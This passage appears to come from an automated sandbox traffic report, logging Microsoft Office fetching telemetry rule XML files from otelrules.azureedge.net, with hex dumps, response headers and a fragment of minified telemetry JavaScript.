                                                                                                                                                                        Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                        2024-11-21 09:38:10 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                        Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                        2024-11-21 09:38:10 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                        Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        133192.168.2.64986513.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:09 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:09 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:09 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                        ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                        x-ms-request-id: 6b735921-c01e-0066-37ca-3ba1ec000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093809Z-1777c6cb7544n7p6hC1TEByvb40000000b1g000000007g7m
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:09 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        134192.168.2.64986713.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:09 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:09 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                        ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                        x-ms-request-id: 443fb44f-501e-0029-3f61-3bd0b8000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093809Z-178bfbc474bp8mkvhC1NYCzqnn000000012g00000000a5e6
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:10 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        135192.168.2.64986813.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:09 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:09 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                        ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                        x-ms-request-id: 5c785bae-401e-0083-638c-3a075c000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093809Z-178bfbc474brk967hC1NYCfu6000000000yg00000000fwwf
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:10 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        136192.168.2.64986913.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:09 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:10 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                        ETag: "0x8DC582BDF497570"
                                                                                                                                                                        x-ms-request-id: ff0b0d52-c01e-002b-2681-3b6e00000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093810Z-1777c6cb7544nvmshC1TEBf7qc0000000atg0000000037f0
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:10 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        137192.168.2.64987013.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:10 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:10 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                        ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                        x-ms-request-id: 8945419b-e01e-0003-217d-3b0fa8000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093810Z-178bfbc474bh5zbqhC1NYCkdug000000018g000000003p40
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:10 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        138192.168.2.64988113.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:11 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:11 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:11 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                        ETag: "0x8DC582BEA414B16"
                                                                                                                                                                        x-ms-request-id: c743bc84-701e-006f-2bdb-3bafc4000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093811Z-r1d97b99577hsvhhhC1TEByb1w00000004k0000000000y11
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:11 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        139192.168.2.64988313.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:11 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:12 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:12 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                        ETag: "0x8DC582BEB256F43"
                                                                                                                                                                        x-ms-request-id: b2a27076-001e-0017-47b7-3b0c3c000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093812Z-r1d97b99577sdxndhC1TEBec5n0000000a6000000000h0ue
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:12 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        140192.168.2.64988213.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:12 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:12 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:12 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                        ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                        x-ms-request-id: 21476416-401e-00a3-1c88-3a8b09000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093812Z-178bfbc474bwlrhlhC1NYCy3kg000000018000000000a5hd
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:12 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        141192.168.2.64988413.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:12 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:12 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                        ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                        x-ms-request-id: 15f0f872-401e-005b-40aa-3b9c0c000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093812Z-r1d97b995777mdbwhC1TEBezag0000000a8g000000000uen
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
